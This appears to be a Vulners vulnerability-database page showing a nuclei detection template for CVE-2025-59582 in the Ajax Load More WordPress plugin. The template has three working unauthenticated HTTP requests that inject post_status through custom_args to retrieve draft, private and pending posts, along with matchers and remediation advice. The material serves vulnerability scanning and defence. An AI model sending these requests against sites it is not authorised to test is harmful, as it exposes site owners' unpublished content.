Lucene search
K

Ajax Load More < 7.6.1 - Unauthenticated Sensitive Information Exposure

🗓️ 23 Apr 2026 11:14:07Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

Unauthenticated exposure of non-public posts via Ajax Load More endpoint, bypassing post_status checks.

Related
Refs
Code
id: CVE-2025-59582

info:
  name: Ajax Load More < 7.6.1 - Unauthenticated Sensitive Information Exposure
  author: pussycat0x
  severity: medium
  description: |
    The Ajax Load More – Infinite Scroll plugin for WordPress is vulnerable to  Sensitive Information Exposure in all versions up to, and including, 7.6.0.2. The plugin's AJAX endpoint (wp_ajax_nopriv_alm_get_posts) allows unauthenticated  users to access non-public posts (draft, private, pending, future, trash) by
    injecting post_status via the custom_args parameter, which bypasses the post_status authorization check in class-alm-queryargs.php.
  impact:
    Attackers can retrieve sensitive embedded system information, potentially aiding further attacks or data leaks.
  remediation:
    Update to the latest version beyond 7.6.0.2
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ajax-load-more/ajax-load-more-7602-unauthenticated-sensitive-information-exposure
  metadata:
    verified: true
    max-request: 3
    publicwww-query: "/wp-content/plugins/ajax-load-more/"
  tags: cve,cve2025,wordpress,wp-plugin,ajax-load-more,unauth

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=alm_get_posts&post_type=post&posts_per_page=5&custom_args=post_status:draft HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        X-Requested-With: XMLHttpRequest

      - |
        GET /wp-admin/admin-ajax.php?action=alm_get_posts&post_type=post&posts_per_page=5&custom_args=post_status:private HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        X-Requested-With: XMLHttpRequest

      - |
        GET /wp-admin/admin-ajax.php?action=alm_get_posts&post_type=post&posts_per_page=5&custom_args=post_status:pending HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        X-Requested-With: XMLHttpRequest

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "\"html\":") && contains(body_1, "\"totalposts\":")'
        condition: and

    extractors:
      - type: regex
        name: totalpost
        part: body
        internal: true
        group: 1
        regex:
          - '"totalposts":([0-9]+)'
# digest: 490a0046304402204aa476f3eb6f48527676ec3bc7e4f2b5c472e611fc8b9d5f8491e1d1ac527aa402204b9666554e2fc5cca10d1bf98e569bedfcb057a7b6f51db4edc4370f060f2648:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Apr 2026 10:01Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.15.3
EPSS0.00661
SSVC
10